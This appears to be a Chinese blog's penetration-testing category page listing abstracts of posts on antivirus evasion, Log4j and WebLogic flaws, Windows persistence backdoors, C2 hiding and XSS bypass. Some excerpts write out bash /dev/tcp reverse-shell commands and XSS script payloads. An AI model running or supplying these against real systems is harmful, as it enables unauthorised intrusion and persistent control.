随笔分类 - 渗透测试
摘要:前言 目前越来越多的网站系统在登录接口、数据请求接口中加入各式各样的加密算法,甚至有些网站在每次请求前都动态请求加密密钥等措施,对接口渗透工作造成较大障碍,简单对登录接口暴力破解时字段被加密,如何处理加密内容进行暴破来进行一个简单思路的分享。 常规思路 前端js逆向,通过对js里的加密算法进行破解,
阅读全文
摘要:Go-Shellcode-Bypass Golang实现的简单免杀,项目地址:https://github.com/Cuerz/Go-Shellcode-Bypass 免杀思路 原理:1.延长运行时间,导致杀软检测超时, 2.利用杀软对golang的弱检测, 3.对shellcode进行多次
阅读全文
摘要:一、漏洞简介 Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 Qu
阅读全文
摘要:weblogic端口:7001 SSRF漏洞(CVE-2014-4210) Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻击内网中redis、fastcgi等脆弱组件。影响版本:10.0.2, 10.3.6 任意文件上传漏洞(CVE-2018-2894) Or
阅读全文
摘要:HTTP请求过程 建立连接完毕以后客户端会发送响应给服务端 服务端接受请求并且做出响应发送给客户端 客户端收到响应并且解析响应响应给客户 HTTPS 在使用HTTPS是需要保证服务端配置正确了对应的安全证书 客户端发送请求到服务端 服务端返回公钥和证书到客户端 客户端接收后会验证证书的安全性,如果通
阅读全文
摘要:前言 前面说到了Redis数据库的部署,今天继续更一些关于Redix安全方面的内容,redis写入文件,redis登陆 ssh 和相关安全策略等等。 安装redis-cli 首先,想连接上远程的 redis 数据库,需要安装 redis-cli 下载压缩文件,解压并安装 wget https://d
阅读全文
摘要:前言 在后渗透阶段,当我们获得了服务器shell,很多时候是通过使用一些可执行文件,比如msf和cobaltstrike生成的exe,或者捆绑的软件之类,来获得服务器的权限。 尽管这些会做过免杀,即使能躲过大部分杀软,但由于是运行在内存中,可能导致文件无法删除,因为很容易被发现,因此就需要更深入的进
阅读全文
摘要:关于Log4j 半个月前,Apache的Log4j漏洞爆出,甚至一度被认为是一个核弹级的0 day漏洞。今天来复现一下该漏洞。 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信
阅读全文
摘要:技巧总结 1.添加影子用户 2.在注册表中添加自启动后门 3.通过计划任务添加后门 4.隐藏技巧 具体操作 1.添加影子用户 可见Windows影子用户创建与3389连接 2.在注册表中添加自启动后门 win+r运行输入regedit,进入注册表编辑器 通过 reg add "HKEY_CURREN
阅读全文
摘要:前言 Linux下,一条bash命令就可以反弹出shell。之前不求甚解的复现,突然有了一个疑问,为什么这样就能实现shell反弹?又重新学习了一下bash,这是一篇关于bash反弹原理的介绍。 反弹shell命令如下 受害者: bash -i >& /dev/tcp/ip/port 0>&1 攻击
阅读全文
摘要:kali使用OpenSSL加密反弹shell 通过bash普通反弹shell kali开启监听 nc -lvp 3333 在受害机上反弹交互式shell bash -i &>/dev/tcp/192.168.80.131/3333 <&1 成功反弹了ubuntu的shell,打开wireshark监
阅读全文
摘要:前言 在目前的后门生成工具中,最常用的就是MSF和CobaltStrike了。weevely人称Linux中的菜刀,相比于前两者,最主要的是操作比较简单,接下来简单介绍一下。 基本用法 [+] Run terminal or command on the target //连接后门 weevely
阅读全文
摘要:识别验证码的暴力破解 前言 对于暴力破解,理论上来说,只要字典足够强大,暴力破解一定可以登录成功,但现在的登陆往往还伴随着验证码,比如 所以如何识别验证码,才是最重要的 解决方法 利用BurpSuite插件captcha-killer:https://github.com/c0ny1/captcha
阅读全文
摘要:JavaScript后门创建与使⽤ 前言 今天介绍一种小众的js后门获取shell,使用ps1encode来加密反弹后门。 工具地址:https://github.com/CroweCybersecurity/ps1encode 正文 在文件目录下用下面的命令生成反弹shell的js代码,填入监听机
阅读全文
摘要:Cobaltstrike与MSF会话派生 一般在渗透的过程中,Get到shell之后一般来说我喜欢上线到Cobaltstrike,但是Cobaltstrike的会话是60S更新一次,有时候功能也并没有MSF完善,那么今天记录一下如何实现Cobaltstrike与MSF的联动。 Cobaltstrik
阅读全文
摘要:云函数隐藏C2服务器 前言 基于CS,隐藏C2服务端有很多手段,常见如下: 1.利用域前置 2.走cdn域名 3.利用云厂商服务 其中域前置技术在18年及更早还比较有效,现在越来越多云厂商如cloudflare开始禁止域前置行为 云函数核心思想其实很简单,就是由第三方提供的服务接收C2客户端流量,转
阅读全文
摘要:Windows影子用户创建与3389连接 前言 当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能,并且只可在注册表中被检测出来 (应急响应注册表很重要) 正文 1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。 1 net use
阅读全文
摘要:信息搜集-安全引擎绕过cdn 前言 在进行信息搜集的时候,如果服务器有CDN,就会隐藏真实ip。而很多时候我们在滲透时需要找到其真实IP,现在很多云waf是基于CDN建立的,如果我们能找到目标的真实IP那么云waf就没有用,这也是绕过waf的一种方法。 正文 怎么知道一个服务器有没有CDN呢?既然C
阅读全文
摘要:信息搜集 1.robots.txt 2.网站备份压缩文件 文件可直接访问并下载。可能为.rar、zip、.7z、.tar.gz、.bak、.txt、.swp等等,以及和网站信息有关的文件名www.rar、web、rar等等 3.Git导致文件泄露 在运行gitinit初始化代码库的时候,会在当前目录
阅读全文
摘要:XSS绕过常见方式 转载自:https://www.cnblogs.com/bingtang123/p/12844659.html 1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script><a cla
阅读全文